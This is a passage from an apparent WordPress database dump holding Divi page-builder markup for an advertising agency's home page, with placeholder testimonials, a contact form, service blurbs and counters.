Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:17:06','2020-08-07 20:17:06','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(605,1,'2020-08-07 20:18:10','2020-08-07 20:18:10','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||5px|||\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||40px|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Why We\" title_text=\"Why-we\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" hover_enabled=\"0\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\" custom_margin=\"-86px|||||\"]<h2><span>Why choose us?</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"||31px|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p><span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>\n[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" 